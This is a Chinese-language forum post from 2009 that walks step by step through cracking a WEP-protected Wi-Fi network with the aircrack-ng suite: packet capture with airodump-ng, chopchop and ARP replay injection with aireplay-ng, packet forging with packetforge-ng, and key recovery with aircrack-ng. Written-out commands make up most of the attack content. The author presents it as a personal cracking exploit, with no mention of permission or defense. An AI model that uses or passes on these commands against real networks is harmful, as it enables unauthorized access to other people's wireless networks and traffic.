|
|
①查看无线工作频道,看看周围有哪些无信信号:
airodump-ng eth1(当然你可以先输入ifconfig –a看一下自己无线网卡是哪一个,我的是eth1)
②确实要给2200网卡打补丁:(但有时我也没打补丁,也行的,但你要输入modprobe ipwraw来加载可**的网卡驱动)
modprobe ipw2200 rtap_iface=1
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
③airodump-ng –ivs –w 123 –c 6 eth1
给抓包命名为123,这一步一定要有,我第一次破解时不知道,就没输入这一步,后来当然找不到文件,无法破解了(因为只有这些文件才好从中读出密码,数据交换时会不断的验证密码)。Ivs应该是123文件名的扩展名,后面找文件时就是123-01.ivs这个名字,但有时也可能为123-02.ivs。6是你破解无线所在频道。
④aireplay-ng -4 –b AP’MAC –h 你网卡的MAC eth1 _
这一步就是令人激动的一步,输完后,你会看到屏幕上的数据在不停的增加,有时会涨到满屏,还在不停的刷,有点骇客的感觉了。这一步有时时间很长,有时比较短,论坛上说无线用的人下载东西多数据就多,时间就短些,我几次破解看来,大都是是这样的,也有时不一定,而且几次满屏数据刷写的样子也不完全相同。可惜我没截图,如果能截下来,大家就可以看到输入的命令相同,但显示变化不完全相同。
这一步有时会让人感觉失望,因为输完后,并没有出现的那种令人激动的一步,没有数据刷屏,而是出现说“你的网卡在多少频道,而无线AP在多少频道,两个不一致”还说“让你改你的网卡MAC”-“ifconfig eth1 hw ether MAC”改吧,就改成你自己的网卡MAC,虽然不应该要改的(有时不出现这种问题,直接出现满屏数据刷写)。改完了,再重复“aireplay-ng -4 –b AP’MAC –h 你网卡的MAC eth1”就会出激动人心的一步了。
⑤上一步完了系统会显示:Use this packer ?
输入y 又开始满屏数据刷写了
⑥上一步完了会显示“fragment-1216-20***26.xor、或replay_src-1216-20***51.xor”等之类的文件名,我的显示文件名跟论坛上所说也不完全相同,但不用担心,记住它,下步输入就行,我以“replay_src-1216-20***51.xor”为例。你也可以输入ls 来查看,我想相当于DOS里的dir查看文件名一样。
⑦packetforge-ng -0 –a AP’MAC –h My MAC –k 255.255.255.255 –l 255.255.255.255 –y replay_src-1216-20***51.xor –w myrap
这里“0”是数字,“-l”是L的小写。
⑧aireplay-ng -2 –r myrap eth1
⑨系统会显示:this packer ?
输入y,此时数据会猛增。
⑩当数据增加到3万时,另起一个窗口输入:aircrack-ng –n 64 –b AP’MAC 123-01.ivs
就等着密码出来吧, |
|
发表于 2009-9-23 16:58:11